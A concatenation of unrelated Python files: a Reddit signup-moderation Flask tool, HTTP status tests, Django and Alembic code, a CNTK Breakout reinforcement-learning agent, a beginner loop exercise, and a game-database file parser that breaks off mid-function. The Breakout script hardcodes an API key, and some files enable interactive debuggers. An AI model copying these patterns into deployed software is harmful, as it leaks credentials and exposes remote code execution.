    def __hash__(self):
        return 0

#!/usr/bin/env python

import subprocess
import praw
from hashlib import sha1
from flask import Flask
from flask import Response
from flask import request
from cStringIO import StringIO
from base64 import b64encode
from base64 import b64decode
from ConfigParser import ConfigParser
import OAuth2Util
import os
import markdown
import bleach
# encoding=utf8
import sys
from participantCollection import ParticipantCollection

reload(sys)
sys.setdefaultencoding('utf8')


# Edit Me!
# Each day after you post a signup post, copy its 6-character ID to this array.
signupPageSubmissionIds = [ '7zrrj1', '7zxkpq', '8055hn', '80ddrf', '80nbm1', '80waq3' ]
flaskport = 8993

app = Flask(__name__)
app.debug = True
commentHashesAndComments = {}


def loginAndReturnRedditSession():
    config = ConfigParser()
    config.read("../reddit-password-credentials.cfg")
    user = config.get("Reddit", "user")
    password = config.get("Reddit", "password")
    # TODO:  password auth is going away, and we will soon need to do oauth.
    redditSession = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg')
    redditSession.login(user, password, disable_warning=True)
    # submissions = redditSession.get_subreddit('pornfree').get_hot(limit=5)
    # print [str(x) for x in submissions]
    return redditSession


def loginOAuthAndReturnRedditSession():
    redditSession = praw.Reddit(user_agent='Test Script by /u/foobarbazblarg')
    # New version of praw does not require explicit use of the OAuth2Util object.  Presumably because reddit now REQUIRES oauth.
    # o = OAuth2Util.OAuth2Util(redditSession, print_log=True, configfile="../reddit-oauth-credentials.cfg")
    # TODO:  Testing comment of refresh.  We authenticate fresh every time, so presumably no need to do o.refresh().
    # o.refresh(force=True)
    return redditSession


def getSubmissionsForRedditSession(redditSession):
    # submissions = [redditSession.get_submission(submission_id=submissionId) for submissionId in signupPageSubmissionIds]
    submissions = [redditSession.submission(id=submissionId) for submissionId in signupPageSubmissionIds]
    for submission in submissions:
        submission.comments.replace_more(limit=None)
        # submission.replace_more_comments(limit=None, threshold=0)
    return submissions


def getCommentsForSubmissions(submissions):
    comments = []
    for submission in submissions:
        commentForest = submission.comments
        comments += [comment for comment in commentForest.list() if comment.__class__ == praw.models.Comment]
    return comments


def retireCommentHash(commentHash):
    with open("retiredcommenthashes.txt", "a") as commentHashFile:
        commentHashFile.write(commentHash + '\n')


def retiredCommentHashes():
    with open("retiredcommenthashes.txt", "r") as commentHashFile:
        # return commentHashFile.readlines()
        return commentHashFile.read().splitlines()


@app.route('/moderatesignups.html')
def moderatesignups():
    global commentHashesAndComments
    commentHashesAndComments = {}
    stringio = StringIO()
    stringio.write('<html>\n<head>\n</head>\n\n')

    # redditSession = loginAndReturnRedditSession()
    redditSession = loginOAuthAndReturnRedditSession()
    submissions = getSubmissionsForRedditSession(redditSession)
    flat_comments = getCommentsForSubmissions(submissions)
    retiredHashes = retiredCommentHashes()
    i = 1
    stringio.write('<iframe name="invisibleiframe" style="display:none;"></iframe>\n')
    stringio.write("<h3>")
    stringio.write(os.getcwd())
    stringio.write("<br>\n")
    for submission in submissions:
        stringio.write(submission.title)
        stringio.write("<br>\n")
    stringio.write("</h3>\n\n")
    stringio.write('<form action="copydisplayduringsignuptoclipboard.html" method="post" target="invisibleiframe">')
    stringio.write('<input type="submit" value="Copy display-during-signup.py stdout to clipboard">')
    stringio.write('</form>')
    for comment in flat_comments:
        # print comment.is_root
        # print comment.score
        i += 1
        commentHash = sha1()
        commentHash.update(comment.fullname)
        commentHash.update(comment.body.encode('utf-8'))
        commentHash = commentHash.hexdigest()
        if commentHash not in retiredHashes:
            commentHashesAndComments[commentHash] = comment
            authorName = str(comment.author)  # can be None if author was deleted.  So check for that and skip if it's None.
            stringio.write("<hr>\n")
            stringio.write('<font color="blue"><b>')
            stringio.write(authorName)  # can be None if author was deleted.  So check for that and skip if it's None.
            stringio.write('</b></font><br>')
            if ParticipantCollection().hasParticipantNamed(authorName):
                stringio.write(' <small><font color="green">(member)</font></small>')
                # if ParticipantCollection().participantNamed(authorName).isStillIn:
                #    stringio.write(' <small><font color="green">(in)</font></small>')
                # else:
                #    stringio.write(' <small><font color="red">(out)</font></small>')
            else:
                stringio.write(' <small><font color="red">(not a member)</font></small>')
            stringio.write('<form action="takeaction.html" method="post" target="invisibleiframe">')
            stringio.write('<input type="submit" name="actiontotake" value="Signup" style="color:white;background-color:green">')
            # stringio.write('<input type="submit" name="actiontotake" value="Signup and checkin">')
            # stringio.write('<input type="submit" name="actiontotake" value="Relapse">')
            # stringio.write('<input type="submit" name="actiontotake" value="Reinstate">')
            stringio.write('<input type="submit" name="actiontotake" value="Skip comment">')
            stringio.write('<input type="submit" name="actiontotake" value="Skip comment and don\'t upvote">')
            stringio.write('<input type="hidden" name="username" value="' + b64encode(authorName) + '">')
            stringio.write('<input type="hidden" name="commenthash" value="' + commentHash + '">')
            # stringio.write('<input type="hidden" name="commentpermalink" value="' + comment.permalink + '">')
            stringio.write('</form>')

            stringio.write(bleach.clean(markdown.markdown(comment.body.encode('utf-8')), tags=['p']))
            stringio.write("\n<br><br>\n\n")

    stringio.write('</html>')
    pageString = stringio.getvalue()
    stringio.close()
    return Response(pageString, mimetype='text/html')


@app.route('/takeaction.html', methods=["POST"])
def takeaction():
    username = b64decode(request.form["username"])
    commentHash = str(request.form["commenthash"])
    # commentPermalink = request.form["commentpermalink"]
    actionToTake = request.form["actiontotake"]
    # print commentHashesAndComments
    comment = commentHashesAndComments[commentHash]
    # print "comment:  " + str(comment)
    if actionToTake == 'Signup':
        print "signup - " + username
        subprocess.call(['./signup.py', username])
        comment.upvote()
        retireCommentHash(commentHash)
    # if actionToTake == 'Signup and checkin':
    #     print "signup and checkin - " + username
    #     subprocess.call(['./signup-and-checkin.sh', username])
    #     comment.upvote()
    #     retireCommentHash(commentHash)
    # elif actionToTake == 'Relapse':
    #     print "relapse - " + username
    #     subprocess.call(['./relapse.py', username])
    #     comment.upvote()
    #     retireCommentHash(commentHash)
    # elif actionToTake == 'Reinstate':
    #     print "reinstate - " + username
    #     subprocess.call(['./reinstate.py', username])
    #     comment.upvote()
    #     retireCommentHash(commentHash)
    elif actionToTake == 'Skip comment':
        print "Skip comment - " + username
        comment.upvote()
        retireCommentHash(commentHash)
    elif actionToTake == "Skip comment and don't upvote":
        print "Skip comment and don't upvote - " + username
        retireCommentHash(commentHash)
    return Response("hello", mimetype='text/html')


@app.route('/copydisplayduringsignuptoclipboard.html', methods=["POST"])
def copydisplayduringsignuptoclipboard():
    print "TODO: Copy display to clipboard"
    subprocess.call(['./display-during-signup.py'])
    return Response("hello", mimetype='text/html')


if __name__ == '__main__':
    app.run(host='127.0.0.1', port=flaskport)


from flask_webapi import status
from unittest import TestCase


class TestStatus(TestCase):
    def test_is_informational(self):
        self.assertFalse(status.is_informational(99))
        self.assertFalse(status.is_informational(200))

        for i in range(100, 199):
            self.assertTrue(status.is_informational(i))

    def test_is_success(self):
        self.assertFalse(status.is_success(199))
        self.assertFalse(status.is_success(300))

        for i in range(200, 299):
            self.assertTrue(status.is_success(i))

    def test_is_redirect(self):
        self.assertFalse(status.is_redirect(299))
        self.assertFalse(status.is_redirect(400))

        for i in range(300, 399):
            self.assertTrue(status.is_redirect(i))

    def test_is_client_error(self):
        self.assertFalse(status.is_client_error(399))
        self.assertFalse(status.is_client_error(500))

        for i in range(400, 499):
            self.assertTrue(status.is_client_error(i))

    def test_is_server_error(self):
        self.assertFalse(status.is_server_error(499))
        self.assertFalse(status.is_server_error(600))

        for i in range(500, 599):
            self.assertTrue(status.is_server_error(i))

import sys
sys.path.insert(0,'../')
from fast_guided_filter import blur

print("hello")

# from test_plus.test import TestCase
#
#
# class TestUser(TestCase):
#
#     def setUp(self):
#         self.user = self.make_user()
#
#     def test__str__(self):
#         self.assertEqual(
#             self.user.__str__(),
#             'testuser'  # This is the default username for self.make_user()
#         )
#
#     def test_get_absolute_url(self):
#         self.assertEqual(
#             self.user.get_absolute_url(),
#             '/users/testuser/'
#         )


from rest_framework import serializers
from django.contrib.auth.models import User

from dixit.account.models import UserProfile


class UserProfileSerializer(serializers.ModelSerializer):

    class Meta:
        model = UserProfile
        fields = ('name', )


class UserSerializer(serializers.ModelSerializer):
    """
    Serializes User objects
    """
    profile = UserProfileSerializer()

    class Meta:
        model = User
        fields = ('id', 'username', 'email', 'profile', )

# -*- coding: utf-8 -*-

import pack_command
import pack_command_python

import timeit
import cProfile
import pstats
import pycallgraph

def format_time(seconds):
    v = seconds

    if v * 1000 * 1000 * 1000 < 1000:
        scale = u'ns'
        v = int(round(v*1000*1000*1000))
    elif v * 1000 * 1000 < 1000:
        scale = u'μs'
        v = int(round(v*1000*1000))
    elif v * 1000 < 1000:
        scale = u'ms'
        v = round(v*1000, 4)
    else:
        scale = u'sec'
        v = int(v)

    return u'{} {}'.format(v, scale)

# profiler size
number = 100000
sample = 7

# profiler type
profile = False
graph = False
timer = True

def runit():
    pack_command.pack_command("ZADD", "foo", 1369198341, 10000)

def runitp():
    pack_command_python.pack_command("ZADD", "foo", 1369198341, 10000)

if profile:
    pr = cProfile.Profile()
    pr.enable()

if graph:
    pycallgraph.start_trace()

if timer:
    for name, t in (("Python", runitp), ("cython", runit)):
        res = timeit.Timer(t).repeat(sample, number)
        min_run = min(res)
        per_loop = min_run/number

        print u'{}'.format(name)
        print u'{} total run'.format(format_time(min_run))
        print u'{} per/loop'.format(format_time(per_loop))
        #print u'{} per/friend'.format(format_time(per_loop/friends_cnt))
else:
    for j in xrange(number):
        runit()

if graph:
    pycallgraph.make_dot_graph('example.png')

if profile:
    pr.disable()
    ps = pstats.Stats(pr)
    sort_by = 'cumulative'
    ps.strip_dirs().sort_stats(sort_by).print_stats(20)

"""
Initialize Flask app

"""
from flask import Flask
import os
from flask_debugtoolbar import DebugToolbarExtension
from werkzeug.debug import DebuggedApplication

app = Flask('application')

if os.getenv('FLASK_CONF') == 'DEV':
    # Development settings
    app.config.from_object('application.settings.Development')
    # Flask-DebugToolbar
    toolbar = DebugToolbarExtension(app)
    
    # Google app engine mini profiler
    # https://github.com/kamens/gae_mini_profiler
    app.wsgi_app = DebuggedApplication(app.wsgi_app, evalex=True)

    from gae_mini_profiler import profiler, templatetags 

    @app.context_processor
    def inject_profiler():
        return dict(profiler_includes=templatetags.profiler_includes())
    app.wsgi_app = profiler.ProfilerWSGIMiddleware(app.wsgi_app)

elif os.getenv('FLASK_CONF') == 'TEST':
    app.config.from_object('application.settings.Testing')

else:
    app.config.from_object('application.settings.Production')

# Enable jinja2 loop controls extension
app.jinja_env.add_extension('jinja2.ext.loopcontrols')

# Pull in URL dispatch routes
import urls

#!/usr/bin/env python
import os
import sys

import django

from django.conf import settings


DEFAULT_SETTINGS = dict(
    INSTALLED_APPS=[
        "django.contrib.auth",
        "django.contrib.contenttypes",
        "django.contrib.sites",
        "pinax.pinax_hello",
        "pinax.pinax_hello.tests"
    ],
    MIDDLEWARE_CLASSES=[],
    DATABASES={
        "default": {
            "ENGINE": "django.db.backends.sqlite3",
            "NAME": ":memory:",
        }
    },
    SITE_ID=1,
    ROOT_URLCONF="pinax.pinax_hello.tests.urls",
    SECRET_KEY="notasecret",
)


def runtests(*test_args):
    if not settings.configured:
        settings.configure(**DEFAULT_SETTINGS)

    django.setup()

    parent = os.path.dirname(os.path.abspath(__file__))
    sys.path.insert(0, parent)

    try:
        from django.test.runner import DiscoverRunner
        runner_class = DiscoverRunner
        test_args = ["pinax.pinax_hello.tests"]
    except ImportError:
        from django.test.simple import DjangoTestSuiteRunner
        runner_class = DjangoTestSuiteRunner
        test_args = ["tests"]

    failures = runner_class(verbosity=1, interactive=True, failfast=False).run_tests(test_args)
    sys.exit(failures)


if __name__ == "__main__":
    runtests(*sys.argv[1:])

import random
import numpy as np
import math
from time import perf_counter
import os
import sys
from collections import deque

import gym
import cntk
from cntk.layers import  Convolution, MaxPooling,  Dense
from cntk.models import Sequential, LayerStack
from cntk.initializer import glorot_normal


env = gym.make("Breakout-v0")

NUM_ACTIONS = env.action_space.n
SCREEN_H_ORIG, SCREEN_W_ORIG, NUM_COLOUR_CHANNELS = env.observation_space.shape


def preprocess_image(screen_image):

    # crop the top and bottom
    screen_image = screen_image[35:195]

    # down sample by a factor of 2
    screen_image = screen_image[::2, ::2]

    # convert to grey scale
    grey_image = np.zeros(screen_image.shape[0:2])
    for i in range(len(screen_image)):
        for j in range(len(screen_image[i])):
            grey_image[i][j] = np.mean(screen_image[i][j])

    return np.array([grey_image.astype(np.float)])


CHANNELS, IMAGE_H, IMAGE_W = preprocess_image(np.zeros((SCREEN_H_ORIG, SCREEN_W_ORIG))).shape
STATE_DIMS = (1, IMAGE_H, IMAGE_W)

class Brain:

    BATCH_SIZE = 5

    def __init__(self):

        #### Construct the model ####
        observation = cntk.ops.input_variable(STATE_DIMS, np.float32, name="s")
        q_target = cntk.ops.input_variable(NUM_ACTIONS, np.float32, name="q")

        # Define the structure of the neural network
        self.model = self.create_convolutional_neural_network(observation, NUM_ACTIONS)

        #### Define the trainer ####
        self.learning_rate = cntk.learner.training_parameter_schedule(0.0001, cntk.UnitType.sample)
        self.momentum = cntk.learner.momentum_as_time_constant_schedule(0.99)

        self.loss =  cntk.ops.reduce_mean(cntk.ops.square(self.model - q_target), axis=0)
        mean_error = cntk.ops.reduce_mean(cntk.ops.square(self.model - q_target), axis=0)

        learner = cntk.adam_sgd(self.model.parameters, self.learning_rate, momentum=self.momentum)
        self.trainer = cntk.Trainer(self.model, self.loss, mean_error, learner)

    def train(self, x, y):
        data = dict(zip(self.loss.arguments, [y, x]))
        self.trainer.train_minibatch(data, outputs=[self.loss.output])

    def predict(self, s):
        return self.model.eval([s])

    @staticmethod
    def create_multi_layer_neural_network(input_vars, out_dims, num_hidden_layers):

        num_hidden_neurons = 128

        hidden_layer = lambda: Dense(num_hidden_neurons, activation=cntk.ops.relu)
        output_layer = Dense(out_dims, activation=None)

        model = Sequential([LayerStack(num_hidden_layers, hidden_layer),
                            output_layer])(input_vars)
        return model

    @staticmethod
    def create_convolutional_neural_network(input_vars, out_dims):

        convolutional_layer_1 = Convolution((5, 5), 32, strides=1, activation=cntk.ops.relu, pad=True,
                                            init=glorot_normal(), init_bias=0.1)
        pooling_layer_1 = MaxPooling((2, 2), strides=(2, 2), pad=True)

        convolutional_layer_2 = Convolution((5, 5), 64, strides=1, activation=cntk.ops.relu, pad=True,
                                            init=glorot_normal(), init_bias=0.1)
        pooling_layer_2 = MaxPooling((2, 2), strides=(2, 2), pad=True)

        convolutional_layer_3 = Convolution((5, 5), 128, strides=1, activation=cntk.ops.relu, pad=True,
                                            init=glorot_normal(), init_bias=0.1)
        pooling_layer_3 = MaxPooling((2, 2), strides=(2, 2), pad=True)

        fully_connected_layer = Dense(1024, activation=cntk.ops.relu, init=glorot_normal(), init_bias=0.1)

        output_layer = Dense(out_dims, activation=None, init=glorot_normal(), init_bias=0.1)

        model = Sequential([convolutional_layer_1, pooling_layer_1,
                            convolutional_layer_2, pooling_layer_2,
                            #convolutional_layer_3, pooling_layer_3,
                            fully_connected_layer,
                            output_layer])(input_vars)
        return model


class Memory:

    def __init__(self, capacity):
        self.examplers = deque(maxlen=capacity)
        self.capacity = capacity

    def add(self, sample):
        self.examplers.append(sample)

    def get_random_samples(self, num_samples):
        num_samples = min(num_samples, len(self.examplers))
        return random.sample(tuple(self.examplers), num_samples)

    def get_stack(self, start_index, stack_size):
        end_index = len(self.examplers) - stack_size
        if end_index < 0:
            stack = list(self.examplers) + [self.examplers[-1] for _ in range(-end_index)]
        else:
            start_index = min(start_index, end_index)
            stack = [self.examplers[i + start_index] for i in range(stack_size)]
        return np.stack(stack, axis=-1)

    def get_random_stacks(self, num_samples, stack_size):

        start_indices = random.sample(range(len(self.examplers)), num_samples)
        return [self.get_stack(start_index, stack_size) for start_index in start_indices]

    def get_latest_stack(self, stack_size):
        return self.get_stack(len(self.examplers), stack_size)


class Agent:

    MEMORY_CAPACITY = 100000
    DISCOUNT_FACTOR = 0.99
    MAX_EXPLORATION_RATE = 1.0
    MIN_EXPLORATION_RATE = 0.01
    DECAY_RATE = 0.0001

    def __init__(self):
        self.explore_rate = self.MAX_EXPLORATION_RATE
        self.brain = Brain()
        self.memory = Memory(self.MEMORY_CAPACITY)
        self.steps = 0

    def act(self, s):
        if random.random() < self.explore_rate:
            return random.randint(0, NUM_ACTIONS - 1)
        else:

            return np.argmax(self.brain.predict(s))

    def observe(self, sample):
        self.steps += 1
        self.memory.add(sample)

        # Reduces exploration rate linearly
        self.explore_rate = self.MIN_EXPLORATION_RATE + (self.MAX_EXPLORATION_RATE - self.MIN_EXPLORATION_RATE) * math.exp(-self.DECAY_RATE * self.steps)

    def replay(self):
        batch = self.memory.get_random_samples(self.brain.BATCH_SIZE)
        batch_len = len(batch)

        states = np.array([sample[0] for sample in batch], dtype=np.float32)
        no_state = np.zeros(STATE_DIMS)
        resultant_states = np.array([(no_state if sample[3] is None else sample[3]) for sample in batch], dtype=np.float32)

        q_values_batch = self.brain.predict(states)
        future_q_values_batch = self.brain.predict(resultant_states)

        x = np.zeros((batch_len, ) + STATE_DIMS).astype(np.float32)
        y = np.zeros((batch_len, NUM_ACTIONS)).astype(np.float32)

        for i in range(batch_len):
            state, action, reward, resultant_state = batch[i]

            q_values = q_values_batch[0][i]
            if resultant_state is None:
                q_values[action] = reward
            else:
                q_values[action] = reward + self.DISCOUNT_FACTOR * np.amax(future_q_values_batch[0][i])

            x[i] = state
            y[i] = q_values

        self.brain.train(x, y)

    @classmethod
    def action_from_output(cls, output_array):
        return np.argmax(output_array)


def run_simulation(agent, solved_reward_level):

    state = env.reset()
    state = preprocess_image(state)
    total_rewards = 0
    time_step = 0

    while True:
        #env.render()

        time_step += 1

        action = agent.act(state.astype(np.float32))

        resultant_state, reward, done, info = env.step(action)
        resultant_state = preprocess_image(resultant_state)

        if done: # terminal state
            resultant_state = None

        agent.observe((state, action, reward, resultant_state))
        agent.replay()

        state = resultant_state
        total_rewards += reward

        if total_rewards > solved_reward_level or done:
            return total_rewards, time_step


def test(model_path, num_episodes=10):

    root = cntk.load_model(model_path)
    observation = env.reset()  # reset environment for new episode
    done = False
    for episode in range(num_episodes):
        while not done:
            try:
                env.render()
            except Exception:
                # this might fail on a VM without OpenGL
                pass

            observation = preprocess_image(observation)
            action = np.argmax(root.eval(observation.astype(np.float32)))
            observation, reward, done, info = env.step(action)
        if done:
            observation = env.reset()  # reset environment for new episode


if __name__ == "__main__":

    # Ensure we always get the same amount of randomness
    np.random.seed(0)

    GYM_ENABLE_UPLOAD = False
    GYM_VIDEO_PATH = os.path.join(os.getcwd(), "videos", "atari_breakout_dpn_cntk")
    GYM_API_KEY = "sk_93AMQvdmReWCi8pdL4m6Q"

    MAX_NUM_EPISODES = 1000
    STREAK_TO_END = 120
    DONE_REWARD_LEVEL = 50

    TRAINED_MODEL_DIR = os.path.join(os.getcwd(), "trained_models")
    if not os.path.exists(TRAINED_MODEL_DIR):
        os.makedirs(TRAINED_MODEL_DIR)
    TRAINED_MODEL_NAME = "atari_breakout_dpn.mod"

    EPISODES_PER_PRINT_PROGRESS = 1
    EPISODES_PER_SAVE = 5

    if len(sys.argv) < 2 or sys.argv[1] != "test_only":

        if GYM_ENABLE_UPLOAD:
            env.monitor.start(GYM_VIDEO_PATH, force=True)

        agent = Agent()

        episode_number = 0
        num_streaks = 0
        reward_sum = 0
        time_step_sum = 0
        solved_episode = -1

        training_start_time = perf_counter()

        while episode_number < MAX_NUM_EPISODES:

            # Run the simulation and train the agent
            reward, time_step = run_simulation(agent, DONE_REWARD_LEVEL*2)
            reward_sum += reward
            time_step_sum += time_step

            episode_number += 1
            if episode_number % EPISODES_PER_PRINT_PROGRESS == 0:
                t = perf_counter() - training_start_time
                print("(%d s) Episode: %d, Average reward = %.3f, Average number of time steps = %.3f."
                      % (t, episode_number, reward_sum / EPISODES_PER_PRINT_PROGRESS, time_step_sum/EPISODES_PER_PRINT_PROGRESS))
                reward_sum = 0
                time_step_sum = 0

            # It is considered solved when the sum of reward is over 200
            if reward > DONE_REWARD_LEVEL:
                num_streaks += 1
                solved_episode = episode_number
            else:
                num_streaks = 0
                solved_episode = -1

            # It's considered done when it's solved over 120 times consecutively
            if num_streaks > STREAK_TO_END:
                print("Task solved in %d episodes and repeated %d times." % (episode_number, num_streaks))
                break

            if episode_number % EPISODES_PER_SAVE == 0:
                agent.brain.model.save_model(os.path.join(TRAINED_MODEL_DIR, TRAINED_MODEL_NAME), False)

        agent.brain.model.save_model(os.path.join(TRAINED_MODEL_DIR, TRAINED_MODEL_NAME), False)

        if GYM_ENABLE_UPLOAD:
            env.monitor.close()
            gym.upload(GYM_VIDEO_PATH, api_key=GYM_API_KEY)

    # testing the model
    test(os.path.join(TRAINED_MODEL_DIR, TRAINED_MODEL_NAME), num_episodes=10)

the_count = [1, 2, 3, 4, 5]
fruits = ['apple', 'oranges', 'pears', 'apricots',]
change = [1, 'pennies', 2, 'dimes', 3, 'quarters',]

#this first kind of for-loop goes through a list
for number in the_count:
    print("This is count %d" % number)

# same as above
for fruit in fruits:
    print("A fruit of type: %s" % fruit)

# also we can go through mixed lists too
# notice we have to use %r since we don't know what's in it
for i in change:
    print("I got %r " % i)

# we can alse build lists, first start with an empty one
elements = []

# then use the range function to do 0 to 5 counts
for i in range(0,6):
    print("Adding %d to the list." % i)
    # append is a function that lists understand
    elements.append(i)

# now we can print them out too
for i in elements:
    print("Element was: %d" % i)

"""adding timestamps to all tables

Revision ID: c0a714ade734
Revises: 1a886e694fca
Create Date: 2016-04-20 14:46:06.407765

"""

# revision identifiers, used by Alembic.
revision = 'c0a714ade734'
down_revision = '1a886e694fca'
branch_labels = None
depends_on = None

from alembic import op
import sqlalchemy as sa

def upgrade(engine_name):
    globals()["upgrade_%s" % engine_name]()


def downgrade(engine_name):
    globals()["downgrade_%s" % engine_name]()


def upgrade_validation():
    ### commands auto generated by Alembic - please adjust! ###
    op.add_column('field_type', sa.Column('created_at', sa.DateTime(), nullable=True))
    op.add_column('field_type', sa.Column('updated_at', sa.DateTime(), nullable=True))
    op.add_column('file_columns', sa.Column('created_at', sa.DateTime(), nullable=True))
    op.add_column('file_columns', sa.Column('updated_at', sa.DateTime(), nullable=True))
    op.add_column('file_type', sa.Column('created_at', sa.DateTime(), nullable=True))
    op.add_column('file_type', sa.Column('updated_at', sa.DateTime(), nullable=True))
    op.add_column('multi_field_rule', sa.Column('created_at', sa.DateTime(), nullable=True))
    op.add_column('multi_field_rule', sa.Column('updated_at', sa.DateTime(), nullable=True))
    op.add_column('multi_field_rule_type', sa.Column('created_at', sa.DateTime(), nullable=True))
    op.add_column('multi_field_rule_type', sa.Column('updated_at', sa.DateTime(), nullable=True))
    op.add_column('rule', sa.Column('created_at', sa.DateTime(), nullable=True))
    op.add_column('rule', sa.Column('updated_at', sa.DateTime(), nullable=True))
    op.add_column('rule_timing', sa.Column('created_at', sa.DateTime(), nullable=True))
    op.add_column('rule_timing', sa.Column('updated_at', sa.DateTime(), nullable=True))
    op.add_column('rule_type', sa.Column('created_at', sa.DateTime(), nullable=True))
    op.add_column('rule_type', sa.Column('updated_at', sa.DateTime(), nullable=True))
    op.add_column('tas_lookup', sa.Column('created_at', sa.DateTime(), nullable=True))
    op.add_column('tas_lookup', sa.Column('updated_at', sa.DateTime(), nullable=True))
    ### end Alembic commands ###


def downgrade_validation():
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('tas_lookup', 'updated_at')
    op.drop_column('tas_lookup', 'created_at')
    op.drop_column('rule_type', 'updated_at')
    op.drop_column('rule_type', 'created_at')
    op.drop_column('rule_timing', 'updated_at')
    op.drop_column('rule_timing', 'created_at')
    op.drop_column('rule', 'updated_at')
    op.drop_column('rule', 'created_at')
    op.drop_column('multi_field_rule_type', 'updated_at')
    op.drop_column('multi_field_rule_type', 'created_at')
    op.drop_column('multi_field_rule', 'updated_at')
    op.drop_column('multi_field_rule', 'created_at')
    op.drop_column('file_type', 'updated_at')
    op.drop_column('file_type', 'created_at')
    op.drop_column('file_columns', 'updated_at')
    op.drop_column('file_columns', 'created_at')
    op.drop_column('field_type', 'updated_at')
    op.drop_column('field_type', 'created_at')
    ### end Alembic commands ###

from cStringIO import StringIO
from struct import pack, unpack, error as StructError
from .log import log
from .structures import fields


class DBFile(object):
	"""
	Base class for WDB and DBC files
	"""

	@classmethod
	def open(cls, file, build, structure, environment):
		if isinstance(file, basestring):
			file = open(file, "rb")

		instance = cls(file, build, environment)
		instance._readHeader()
		instance.setStructure(structure)
		instance._rowDynamicFields = 0 # Dynamic fields index, used when parsing a row
		instance._readAddresses()

		return instance

	def __init__(self, file=None, build=None, environment=None):
		self._addresses = {}
		self._values = {}
		self.file = file
		self.build = build
		self.environment = environment

	def __repr__(self):
		return "%s(file=%r, build=%r)" % (self.__class__.__name__, self.file, self.build)

	def __contains__(self, id):
		return id in self._addresses

	def __getitem__(self, item):
		if isinstance(item, slice):
			keys = sorted(self._addresses.keys())[item]
			return [self[k] for k in keys]

		if item not in self._values:
			self._parse_row(item)

		return self._values[item]

	def __setitem__(self, item, value):
		if not isinstance(item, int):
			raise TypeError("DBFile indices must be integers, not %s" % (type(item)))

		if isinstance(value, DBRow):
			self._values[item] = value
			self._addresses[item] = -1
		else:
			# FIXME technically we should allow DBRow, but this is untested and will need resetting parent
			raise TypeError("Unsupported type for DBFile.__setitem__: %s" % (type(value)))

	def __delitem__(self, item):
		if item in self._values:
			del self._values[item]
		del self._addresses[item]

	def __iter__(self):
		return self._addresses.__iter__()

	def __len__(self):
		return len(self._addresses)

	def _add_row(self, id, address, reclen):
		if id in self._addresses: # Something's wrong here
			log.warning("Multiple instances of row %r found in %s" % (id, self.file.name))
		self._addresses[id] = (address, reclen)

	def _parse_field(self, data, field, row=None):
		"""
		Parse a single field in stream.
		"""
		if field.dyn > self._rowDynamicFields:
			return None # The column doesn't exist in this row, we set it to None

		ret = None
		try:
			if isinstance(field, fields.StringField):
				ret = self._parse_string(data)

			elif isinstance(field, fields.DataField): # wowcache.wdb
				length = getattr(row, field.master)
				ret = data.read(length)

			elif isinstance(field, fields.DynamicMaster):
				ret, = unpack("<I", data.read(4))
				self._rowDynamicFields = ret

			else:
				ret, = unpack("<%s" % (field.char), data.read(field.size))
		except StructError:
			log.warning("Field %s could not be parsed properly" % (field))
			ret = None

		return ret

	def supportsSeeking(self):
		return hasattr(self.file, "seek")

	def append(self, row):
		"""
		Append a row at the end of the file.
		If the row does not have an id, one is automatically assigned.
		"""
		i = len(self) + 1 # FIXME this wont work properly in incomplete files
		if "_id" not in row:
			row["_id"] = i
		self[i] = row

	def clear(self):
		"""
		Delete every row in the file
		"""
		for k in self.keys(): # Use key, otherwise we get RuntimeError: dictionary changed size during iteration
			del self[k]

	def keys(self):
		return self._addresses.keys()

	def items(self):
		return [(k, self[k]) for k in self]

	def parse_row(self, data, reclen=0):
		"""
		Assign data to a DBRow instance
		"""
		return DBRow(self, data=data, reclen=reclen)

	def values(self):
		"""
		Return a list of the file's values
		"""
		return [self[id] for id in self]

	def setRow(self, key, **values):
		self.__setitem__(key, DBRow(self, columns=values))

	def size(self):
		if hasattr(self.file, "size"):
			return self.file.size()
		elif isinstance(self.file, file):
			from os.path import getsize
			return getsize(self.file.name)
		raise NotImplementedError

	def update(self, other):
		"""
		Update file from iterable other
		"""
		for k in other:
			self[k] = other[k]

	def write(self, filename=""):
		"""
		Write the file data on disk. If filename is not given, use currently opened file.
		"""
		_filename = filename or self.file.name

		data = self.header.data() + self.data() + self.eof()

		f = open(_filename, "wb") # Don't open before calling data() as uncached rows would be empty
		f.write(data)
		f.close()
		log.info("Written %i bytes at %s" % (len(data), f.name))

		if not filename: # Reopen self.file, we modified it
			# XXX do we need to wipe self._values here?
			self.file.close()
			self.file = open(f.name, "rb")


class DBRow(list):
	"""
	A database row.
	Names of the variables of that class should not be used in field names of structures
	"""
	initialized = False

	def __init__(self, parent, data=None, columns=None, reclen=0):
		self._parent = parent
		self._values = {} # Columns values storage
		self.structure = parent.structure

		self.initialized = True # needed for __setattr__

		if columns:
			if type(columns) == list:
				self.extend(columns)

			elif type(columns) == dict:
				self._default()
				_cols = [k.name for k in self.structure]
				for k in columns:
					try:
						self[_cols.index(k)] = columns[k]
					except ValueError:
						log.warning("Column %r not found" % (k))

		elif data:
			dynfields = 0
			data = StringIO(data)
			for field in self.structure:
				_data = parent._parse_field(data, field, self)
				self.append(_data)

			if reclen:
				real_reclen = reclen + self._parent.row_header_size
				if data.tell() != real_reclen:
					log.warning("Reclen not respected for row %r. Expected %i, read %i. (%+i)" % (self.id, real_reclen, data.tell(), real_reclen-data.tell()))

	def __dir__(self):
		result = self.__dict__.keys()
		result.extend(self.structure.column_names)
		return result

	def __getattr__(self, attr):
		if attr in self.structure:
			return self._get_value(attr)

		if attr in self.structure._abstractions: # Union abstractions etc
			field, func = self.structure._abstractions[attr]
			return func(field, self)

		if "__" in attr:
			return self._query(attr)

		return super(DBRow, self).__getattribute__(attr)

	def __int__(self):
		return self.id

	def __setattr__(self, attr, value):
		# Do not preserve the value in DBRow! Use the save method to save.
		if self.initialized and attr in self.structure:
			self._set_value(attr, value)
		return super(DBRow, self).__setattr__(attr, value)

	def __setitem__(self, index, value):
		if not isinstance(index, int):
			raise TypeError("Expected int instance, got %s instead (%r)" % (type(index), index))
		list.__setitem__(self, index, value)
		col = self.structure[index]
		self._values[col.name] = col.to_python(value, row=self)


	def _get_reverse_relation(self, table, field):
		"""
		Return a list of rows matching the reverse relation
		"""
		if not hasattr(self._parent, "_reverse_relation_cache"):
			self._parent._reverse_relation_cache = {}
		cache = self._parent._reverse_relation_cache

		tfield = table + "__" + field
		if tfield not in cache:
			cache[tfield] = {}
			# First time lookup, let's build the cache
			table = self._parent.environment.dbFile(table)
			for row in table:
				row = table[row]
				id = row._raw(field)
				if id not in cache[tfield]:
